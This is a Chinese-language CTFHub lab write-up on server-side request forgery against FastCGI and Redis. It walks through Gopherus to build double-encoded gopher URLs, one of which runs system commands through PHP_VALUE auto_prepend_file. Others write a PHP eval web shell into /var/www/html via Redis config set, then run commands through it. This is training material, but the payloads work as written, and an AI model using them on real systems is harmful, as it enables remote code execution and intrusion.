ctfhub ssfr FastCgi & Redis 协议
FastCgi协议
这次.我们需要攻击一下fastcgi协议咯.也许附件的文章会对你有点帮助
首先我们要先了解这个协议内容(具体查看ctfhub里面的文章)
在本关我们可以尝试使用linux解决问题(**需要下载python2版本!!!,否则Gopherus无法读取 **并且下载Gopherus脚本)
linux python2下载方法:
[参考博客]((1条消息) 完美解决 Linux安装python2.7 方案_你懂了我的冬天的博客-CSDN博客_linux python2.7)
Gopherus脚本下载方法:
使用脚本:
cd Gopherus python2 gopherus.py --exploit fastcgi
先选择一个当前存在的php页面,选择主页
index.php,命令先执行ls
然后是cat
注意:需要注意的是进行编码时要去掉没有用的空格或者换行,否则将无法成功获得flag
我们获得payload后还需要再进行一次编码
?url=gopher%3A%2F%2F127.0.0.1%3A9000%2F_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%25F6%2506%2500%250F%2510SERVER_SOFTWAREgo%2520%2F%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP%2F1.1%250E%2502CONTENT_LENGTH59%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A%2F%2Finput%250F%2509SCRIPT_FILENAMEindex.php%250D%2501DOCUMENT_ROOT%2F%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%253B%2504%2500%253C%253Fphp%2520system%2528%2527cat%2520%2Ff%252A%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500
注意:需要注意的是进行编码时要去掉没有用的空格或者换行,否则将无法成功获得flag
直接访问地址,
成功获得 flag
Redis 协议
这次来攻击redis协议吧.redis://127.0.0.1:6379,资料?没有资料!自己找!
我们先了解下Redis协议吧
通关的关键还是 Gopherus脚本
python2 gopherus.py --exploit redis
在进行一次url编码:
gopher%3A%2F%2F127.0.0.1%3A6379%2F_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252447%250D%250A%250A%250A%253C%253Fphp%2520phpinfo%2528%2529%253B%2520%2540eval%2528%2524_POST%255B%2527shell%2527%255D%2529%253B%253F%253E%2520%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A
然后上传到网页:
出现504界面,说明上传成功,如果不放心可以进行查看shell.php
?url=gopher%3A%2F%2F127.0.0.1%3A6379%2F_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252432%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_GET%255B%2522feng%2522%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25248%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A
然后进行AntSword链接,发现链接失败(不清楚,很玄学)
没办法换种方法:
重新使用脚本,更改 脚本内容
'<?php eval($_GET["shell"]);?>'
重新上传,然后使用 get 进行访问:
shell.php?shell=system("ls /");
shell.php?feng=system("cat /flag_44c78dae075af9658640863a76166df9");
点击提交,成功!